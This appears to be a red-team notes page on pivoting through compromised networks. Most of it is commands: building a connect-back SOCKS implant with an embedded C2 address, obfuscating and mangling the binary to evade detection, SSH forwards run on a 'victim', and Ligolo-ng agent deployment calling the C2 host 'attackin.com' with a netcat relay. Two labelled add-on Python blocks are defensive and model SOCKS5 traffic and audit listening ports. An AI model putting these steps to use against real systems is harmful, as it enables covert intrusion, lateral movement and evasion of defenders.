Overview
Resources:
- Really good Red Team Pivoting Guide: https://artkond.com/2017/03/23/pivoting-guide/
- Another one, with a lot of standard Windows tools: https://hackmag.com/security/windows-pivoting/
- Pivoting lab and writeup for syntax: https://tryhackme.com/room/wreath and https://executeatwill.com/2022/04/04/TryHackMe-Wreath-Walkthrough/

Tools:
- SharpChisel-NG, a new version of SharpChisel whose latest release is built in a pipeline: https://github.com/latortuga71/SharpChisel-NG
- Resocks, a Go connect-back SOCKS proxy: https://github.com/RedTeamPentesting/resocks
Obfuscate
GoRedOps: https://github.com/EvilBytecode/GoRedOps
GoObfuscator, obfuscates strings (can break the resulting binary): https://github.com/EvilBytecode/GoRedOps/tree/main/GoObfuscator
```bash
# fetch the dependencies the obfuscator needs inside the resocks module
cd resocks
go get github.com/sirupsen/logrus
go get golang.org/x/tools/go/ast/astutil
cd ..
# rewrite the sources in place (-writechanges) with call, loop, string and dead-code obfuscation
go run GoFuscator.go -srcpath .\resocks2 -writechanges -calls -loops -strings -stringsKey "0101010101010101010101010101010101010101010101010101010101010101" -stringNonce "010101010101010101010101" -verbose -deadcode
```
Build with Built-in Key / Address
```powershell
$key = go run . generate   # generate a connection key
$hostsrv = ""              # connect-back address (host:port)
# go build -ldflags="-X main.defaultConnectionKey=$key"
# go build -ldflags="-X main.defaultConnectBackAddress=$hostsrv"
go build -ldflags="-X main.defaultConnectionKey=$key -X main.defaultConnectBackAddress=$hostsrv"
```
Mangle
```powershell
go get github.com/Binject/debug/pe
git clone https://github.com/optiv/Mangle
cd Mangle
go build Mangle.go
.\Mangle.exe -I .\resocks.exe -M -O resocks_mangle.exe -S 75
```
Then, on the server side, run the listener with the new key as an environment variable:
```bash
# use the key from above
export RESOCKS_KEY=""
resocks listen
```
RDP
Create an RDP server on a Debian-based machine
```bash
sudo apt-get update -y
sudo apt-get install xrdp xfce4 -y
sudo systemctl enable xrdp
sudo systemctl start xrdp
sudo ufw allow from any to any port 3389 proto tcp
echo "startxfce4" > ~/.xsession
sudo systemctl restart xrdp
```
SSH
```bash
sudo adduser sshproxy
sudo nano /etc/passwd   # modify so the user has /bin/false as its shell
sudo apt install proxychains
sudo nano /etc/proxychains.conf
```
On Victim
```bash
USER=""
HOST=""
ssh -D 9050 $USER@$HOST   # dynamic forward: local SOCKS listener on 9050
```
Host
```bash
sudo proxychains nmap -sT -Pn 192.168.2.7
```
Reverse
```bash
ssh -R 9050:localhost:9050 $USER@$HOST -N
```
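What actually crosses the `-D 9050` listener is a plain SOCKS5 handshake (RFC 1928), which is useful to know when auditing or inspecting that traffic. The following is an added example, not part of these notes and not code from OpenSSH or proxychains: it models both sides of the exchange in memory (the client greeting and CONNECT request that proxychains sends, and the proxy's method selection and reply), so you can see exactly what destination a SOCKS client hands to the tunnel. All addresses and ports used are constructed sample values.

```python
"""SOCKS5 handshake as seen on an ssh -D listener (RFC 1928), modelled in memory.

Added example, not part of the original notes; sample values are constructed.
"""
import ipaddress
import struct

SOCKS_VERSION = 0x05
NO_AUTH = 0x00          # ssh -D only offers the no-authentication method
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REP_SUCCEEDED = 0x00


def build_greeting(methods=(NO_AUTH,)):
    """Client -> proxy: VER, NMETHODS, METHODS."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def parse_greeting(data):
    """Proxy side: return the offered method list, or raise on a malformed greeting."""
    if len(data) < 2 or data[0] != SOCKS_VERSION or len(data) != 2 + data[1]:
        raise ValueError("malformed SOCKS5 greeting")
    return list(data[2:])


def build_method_selection(method=NO_AUTH):
    """Proxy -> client: VER, METHOD (0xFF would mean no acceptable method)."""
    return bytes([SOCKS_VERSION, method])


def build_connect_request(host, port):
    """Client -> proxy: VER, CMD, RSV, ATYP, DST.ADDR, DST.PORT.

    Literal IPs are sent as IPv4/IPv6; anything else is sent as a domain name,
    which is how proxychains' proxy_dns lets the far end do the resolution.
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        name = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    else:
        addr = bytes([ATYP_IPV4 if ip.version == 4 else ATYP_IPV6]) + ip.packed
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_connect_request(data):
    """Proxy side: return (cmd, host, port) from a request, validating its length."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 request")
    cmd, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        host, end = str(ipaddress.IPv4Address(data[4:8])), 8
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        host, end = data[5:5 + n].decode("idna"), 5 + n
    elif atyp == ATYP_IPV6:
        host, end = str(ipaddress.IPv6Address(data[4:20])), 20
    else:
        raise ValueError(f"unknown address type {atyp:#x}")
    if len(data) != end + 2:
        raise ValueError("truncated or trailing bytes in request")
    (port,) = struct.unpack("!H", data[end:end + 2])
    return cmd, host, port


def build_reply(rep=REP_SUCCEEDED, bind_host="0.0.0.0", bind_port=0):
    """Proxy -> client: VER, REP, RSV, ATYP, BND.ADDR, BND.PORT."""
    ip = ipaddress.ip_address(bind_host)
    atyp = ATYP_IPV4 if ip.version == 4 else ATYP_IPV6
    return bytes([SOCKS_VERSION, rep, 0x00, atyp]) + ip.packed + struct.pack("!H", bind_port)


def proxy_view(host, port):
    """Run the whole exchange in memory and return what the proxy learns from it."""
    if parse_greeting(build_greeting()) != [NO_AUTH]:
        raise ValueError("client did not offer no-auth")
    selection = build_method_selection()          # proxy answers 05 00
    cmd, dst_host, dst_port = parse_connect_request(build_connect_request(host, port))
    reply = build_reply()                          # proxy reports success
    return {"cmd": cmd, "host": dst_host, "port": dst_port,
            "selection": selection, "reply_ok": reply[1] == REP_SUCCEEDED}


if __name__ == "__main__":
    # Constructed example: what one proxychains TCP connect looks like on port 9050
    print(proxy_view("192.168.2.7", 445))
```

Two points worth noticing from the layout: the tunnel endpoint sees the destination host and port of every connection in clear, so logging at the SOCKS listener is a cheap place to audit what a forward is used for, and a domain-name request (ATYP 0x03) means name resolution happens on the far side of the tunnel.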
Tools
Ligolo-NG
- Repo: https://github.com/nicocha30/ligolo-ng/
- Guides: https://youtu.be/DM1B8S80EvQ and https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740
- Requirements: build from source; requires Go 1.20
Linux Setup
Set up the tun interface for the proxy
```bash
# linux agent
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_agent_0.4.4_linux_amd64.tar.gz && tar -xzvf ligolo-ng_agent_0.4.4_linux_amd64.tar.gz && rm ligolo-ng_agent_0.4.4_linux_amd64.tar.gz
# windows agent
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_agent_0.4.4_windows_amd64.zip && unzip ligolo-ng_agent_0.4.4_windows_amd64.zip && rm ligolo-ng_agent_0.4.4_windows_amd64.zip
# proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_proxy_0.4.4_linux_amd64.tar.gz && tar -xzvf ligolo-ng_proxy_0.4.4_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.4.4_linux_amd64.tar.gz
user=   # local user that will own the tun device
sudo ip tuntap add user $user mode tun ligolo
sudo ip link set ligolo up
```
Linux Start Proxy
```bash
./proxy -h          # help options
./proxy -autocert   # automatically request Let's Encrypt certificates
```
TLS without Let's Encrypt
```bash
cert=/home/$user/cert.pem
key=/home/$user/key.pem   # private key file, separate from the certificate
./proxy -certfile $cert -keyfile $key
# ./proxy -selfcert   # must use -ignore-cert on the agent side
```
Windows Setup
The proxy requires the Wintun DLL from the WireGuard project
```powershell
Invoke-WebRequest -Uri https://www.wintun.net/builds/wintun-0.14.1.zip -OutFile wintun-0.14.1.zip; Expand-Archive -Path wintun-0.14.1.zip -DestinationPath .\; Remove-Item wintun-0.14.1.zip
Invoke-WebRequest -Uri https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_proxy_0.4.4_windows_amd64.zip -OutFile ligolo.zip; Expand-Archive -Path ligolo.zip -DestinationPath .\; Remove-Item ligolo.zip
Invoke-WebRequest -Uri https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_agent_0.4.4_windows_amd64.zip -OutFile agent.zip; Expand-Archive -Path agent.zip -DestinationPath .\; Remove-Item agent.zip
Copy-Item -Path .\wintun\bin\amd64\*.dll -Destination .\ligolo\
```
Agent Usage
```bash
c2=attackin.com   # -connect takes host:port, not a URL, so no https:// prefix
./agent -connect $c2:11601
```
Agent via a SOCKS5 proxy
```bash
c2=attackin.com
# -socks takes the address of the SOCKS5 proxy to go through (127.0.0.1:1080 is a placeholder)
./agent -connect $c2:11601 -socks 127.0.0.1:1080
# optional: -socks-user <user> -socks-pass <pass>
```
Interacting - Linux - Add Route to Ligolo
```bash
ligolo-ng >> session
1
ifconfig   # shows the agent's IPv4 address and subnet, e.g. 192.168.0.30/24
sudo ip route add 192.168.0.0/24 dev ligolo   # tun device is ligolo
```
Interacting - Windows - Add Route to Ligolo
```powershell
netsh int ipv4 show interfaces
route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
```
Access Network
From the proxy server
```bash
start   # starts the tunnel
nmap 192.168.0.0/24 -v -sV -n --unprivileged   # or -PE; uses the tunnel and reduces false positives if we're not admin
```
Add Listener to Agent, redirecting all traffic from agent port 1234 to C2 server port 4321
Start a listener on the agent that redirects to the C2 server
```bash
# From the Ligolo-ng session
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
```
Start a netcat listener to receive the traffic
```bash
# From the proxy
nc -lvp 4321
```
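From the host's point of view, `listener_add` simply opens a new TCP socket bound to all interfaces and owned by the agent process, which is exactly what a periodic listening-port audit catches. The following is an added example, not part of these notes and not code from the ligolo-ng project: it parses `ss -ltnp`-style output, compares each listener against an allowlist of expected (port, process) pairs, and reports anything else, wildcard-bound sockets first. The `ss` lines, the process name `agent` and the allowlist are constructed sample data.

```python
"""Audit listening TCP sockets against an allowlist (added example, not from the notes).

Parses `ss -ltnp` output and reports listeners that are not expected on the host.
The sample output and allowlist below are constructed, not captured from a real system.
"""
import re

# matches the first ("name",pid=N ...) entry of the ss Process column
PROC_RE = re.compile(r'\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')

# Constructed sample of `ss -ltnp` output
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       4096    127.0.0.1:631        0.0.0.0:*          users:(("cupsd",pid=903,fd=7))
LISTEN  0       4096    0.0.0.0:1234         0.0.0.0:*          users:(("agent",pid=4242,fd=9))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
"""

# Expected (port, process) pairs for this host; anything else is reported
ALLOWLIST = {(22, "sshd"), (631, "cupsd")}

WILDCARD_ADDRS = ("0.0.0.0", "[::]", "*")


def parse_ss(output):
    """Return one dict per LISTEN line: local address, port, wildcard flag, process, pid."""
    sockets = []
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue                      # skip the header and non-listening rows
        addr, _, port = fields[3].rpartition(":")   # handles [::]:22 as well as 0.0.0.0:22
        m = PROC_RE.search(line)
        sockets.append({
            "addr": addr,
            "port": int(port),
            "wildcard": addr in WILDCARD_ADDRS,
            "proc": m.group("name") if m else None,   # None when ss could not attribute it
            "pid": int(m.group("pid")) if m else None,
        })
    return sockets


def find_unexpected(output, allowlist=ALLOWLIST):
    """Listeners whose (port, process) pair is not allowlisted, wildcard-bound ones first."""
    hits = [s for s in parse_ss(output) if (s["port"], s["proc"]) not in allowlist]
    return sorted(hits, key=lambda s: (not s["wildcard"], s["port"]))


if __name__ == "__main__":
    for s in find_unexpected(SAMPLE_SS):
        scope = "all interfaces" if s["wildcard"] else s["addr"]
        print(f"port {s['port']} on {scope}: {s['proc']} (pid {s['pid']})")
```

Keying the allowlist on the (port, process) pair rather than the port alone matters: a forward that reuses a familiar port number still shows up because the owning process is not the expected one.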
OpenVPN / HANS
```powershell
choco install openvpn
# or
iwr https://swupdate.openvpn.org/community/releases/OpenVPN-2.6.6-I001-amd64.msi -o openvpn.msi
```